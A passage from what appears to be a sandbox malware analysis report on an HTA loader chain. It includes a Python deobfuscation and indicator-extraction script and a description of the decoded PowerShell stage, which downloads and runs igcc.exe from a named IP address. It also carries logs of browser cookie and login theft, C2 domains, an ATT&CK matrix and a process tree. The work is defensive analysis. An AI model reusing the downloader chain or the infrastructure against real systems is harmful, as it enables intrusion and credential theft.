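            out.append(literal.replace("''", "'"))  # '' is an escaped quote
    return "".join(out)


def decode_inner_payload(cmdline: str) -> str:
    """Rebuild the concatenation, then decode the base64 argument it exposes."""
    match = B64_CALL.search(rebuild_concatenation(cmdline))
    if match is None:
        raise ValueError('no FromBase64String("...") call after rebuilding')
    return base64.b64decode(match.group(1)).decode("utf-8")


def normalize_payload(payload: str) -> str:
    """Collapse the whitespace padding between tokens."""
    return re.sub(r"\s+", " ", payload).strip()


def extract_indicators(payload: str) -> dict:
    """What a responder blocks first: download URL, drop path, P/Invoke target."""
    return {
        "urls": sorted(set(re.findall(r"https?://[^\s\"']+", payload))),
        "drop_paths": sorted({p.lower() for p in
                              re.findall(r"\$env:appdata\\[^\s\"']+", payload, re.I)}),
        "pinvoke_dlls": re.findall(r'DllImport\("([^"]+)"', payload, re.I),
        "uses_add_type": re.search(r"\badd-type\b", payload, re.I) is not None,
    }


def payload_survives_lowercasing(cmdline: str) -> bool:
    """Base64 is case-sensitive: a case-folded copy of the event (the form the
    Sigma-matched lines above are stored in) does not decode back to the
    payload, so decode from the original-case command line."""
    try:
        text = decode_inner_payload(cmdline.lower())
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
        return False
    return "urldownloadtofile" in text.lower()


if __name__ == "__main__":
    decoded = normalize_payload(decode_inner_payload(OBSERVED_CMDLINE))
    print(decoded)
    print(extract_indicators(decoded))
    print("decodable after lowercasing:", payload_survives_lowercasing(OBSERVED_CMDLINE))
```

Run stand-alone it prints the reassembled second stage (an Add-Type P/Invoke definition of URLDownloadToFile from urlmon.dll, the download of http://172.245.208.21/233/igcc.exe into $ENV:APPDATA\igcc.exe, a three-second sleep and Invoke-Item on the dropped file), the indicator dictionary, and False for the lowercased copy. The fragment-joining step is the part worth keeping for other samples of this family: the [char] codes can change and the literal boundaries can move, but the rebuilt text always contains a FromBase64String call to search for.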
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00067CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,12_2_00067CAF
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0006874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_0006874B
                  Source: igcc.exe, 0000000C.00000002.1362921079.00000000000C4000.00000002.00000001.01000000.00000009.sdmp, igcc[1].exe.3.dr, igcc.exe.3.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: WRNKS5Hlc0y.exe, 0000000F.00000000.1531780194.0000000000C60000.00000002.00000001.00040000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000002.3665568415.0000000000C60000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: XProgram Manager
                  Source: igcc.exe, WRNKS5Hlc0y.exe, 0000000F.00000000.1531780194.0000000000C60000.00000002.00000001.00040000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000002.3665568415.0000000000C60000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                  Source: WRNKS5Hlc0y.exe, 0000000F.00000000.1531780194.0000000000C60000.00000002.00000001.00040000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000002.3665568415.0000000000C60000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                  Source: WRNKS5Hlc0y.exe, 0000000F.00000000.1531780194.0000000000C60000.00000002.00000001.00040000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000002.3665568415.0000000000C60000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_0003862B cpuid 12_2_0003862B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00044E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00044E87
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00051E06 GetUserNameW,12_2_00051E06
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00043F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_00043F3A
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_000149A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000010.00000002.3663915117.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000010.00000002.3664272191.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000D.00000002.1614478454.0000000007480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000D.00000002.1609453239.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.3675591492.0000000006A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000010.00000002.3664383512.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000D.00000002.1611189571.00000000047A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.3666208376.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                  Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                  Source: C:\Windows\SysWOW64\AtBroker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\SysWOW64\AtBroker.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                  Source: igcc.exe | Binary or memory string: WIN_81
                  Source: igcc.exe | Binary or memory string: WIN_XP
                  Source: igcc.exe | Binary or memory string: WIN_XPe
                  Source: igcc.exe | Binary or memory string: WIN_VISTA
                  Source: igcc.exe | Binary or memory string: WIN_7
                  Source: igcc.exe | Binary or memory string: WIN_8
                  Source: igcc.exe.3.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                  Remote Access Functionality

                  Source: Yara match | File source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000010.00000002.3663915117.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000010.00000002.3664272191.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000D.00000002.1614478454.0000000007480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000D.00000002.1609453239.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.3675591492.0000000006A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000010.00000002.3664383512.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000D.00000002.1611189571.00000000047A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.3666208376.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00086283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,12_2_00086283
                  Source: C:\Users\user\AppData\Roaming\igcc.exe | Code function: 12_2_00086747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_00086747
                  MITRE ATT&CK Matrix

                  The report's matrix is rebuilt below by tactic. A number in parentheses is the count the report attaches to that technique (the number of matched signatures); techniques without a number are matrix entries the report lists without a match.

                  Tactic | Techniques
                  Reconnaissance | Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                  Resource Development | Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                  Initial Access | Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                  Execution | Native API (1); Command and Scripting Interpreter (11); PowerShell (3); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                  Persistence | DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                  Privilege Escalation | Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (312); Startup Items; Scheduled Task/Job; At; Cron
                  Defense Evasion | Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Masquerading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (31); Access Token Manipulation (21); Process Injection (312)
                  Credential Access | OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                  Discovery | System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (128); Security Software Discovery (251); Virtualization/Sandbox Evasion (31); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1); Network Service Discovery
                  Lateral Movement | Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                  Collection | Archive Collected Data (1); Data from Local System (1); Email Collection (11); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                  Command and Control | Ingress Tool Transfer (14); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (14); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                  Exfiltration | Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                  Impact | System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                  Behavior Graph (ID: 1665583, Sample: njo.hta, Startdate: 15/04/2025, Architecture: WINDOWS, Score: 100)

                  The graph is rebuilt below as a process tree; each node lists its DNS/IP contacts, dropped files and matched signatures, and the edges are "started" or "injected" relations between processes.

                  Start: njo.hta
                    DNS/IP: www.vczuahand.xyz; www.play-venom-rush.xyz; 16 other IPs or domains
                    Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 7 other signatures
                    www.play-venom-rush.xyz: Performs DNS queries to domains with low reputation
                    started: mshta.exe
                      Signatures: Suspicious command line found; PowerShell case anomaly found
                      started: cmd.exe
                        Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; PowerShell case anomaly found
                        started: conhost.exe
                        started: powershell.exe
                          DNS/IP: 172.245.208.21, 49721, 80 AS-COLOCROSSINGUS United States
                          Dropped: C:\Users\user\AppData\Roaming\igcc.exe (PE32); C:\Users\user\AppData\Local\...\igcc[1].exe (PE32); C:\Users\user\AppData\...\qetstupm.cmdline (Unicode)
                          Signatures: Loading BitLocker PowerShell Module; Powershell drops PE file
                          started: csc.exe
                            Dropped: C:\Users\user\AppData\Local\...\qetstupm.dll (PE32)
                            started: cvtres.exe
                          started: igcc.exe
                            Signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; 2 other signatures
                            started: svchost.exe
                              Signatures: Maps a DLL or memory area into another process
                              injected: WRNKS5Hlc0y.exe
                                DNS/IP: www.worrr37.yachts 168.76.121.210, 49723, 80 ULTRANETSERVICOSEMINTERNETLTDABR South Africa; www.soportemx-findmy.click 173.255.194.134, 49725, 49726, 49727 LINODE-APLinodeLLCUS United States; 9 other IPs or domains
                                Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                                started: AtBroker.exe
                                  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
                                  started: firefox.exe
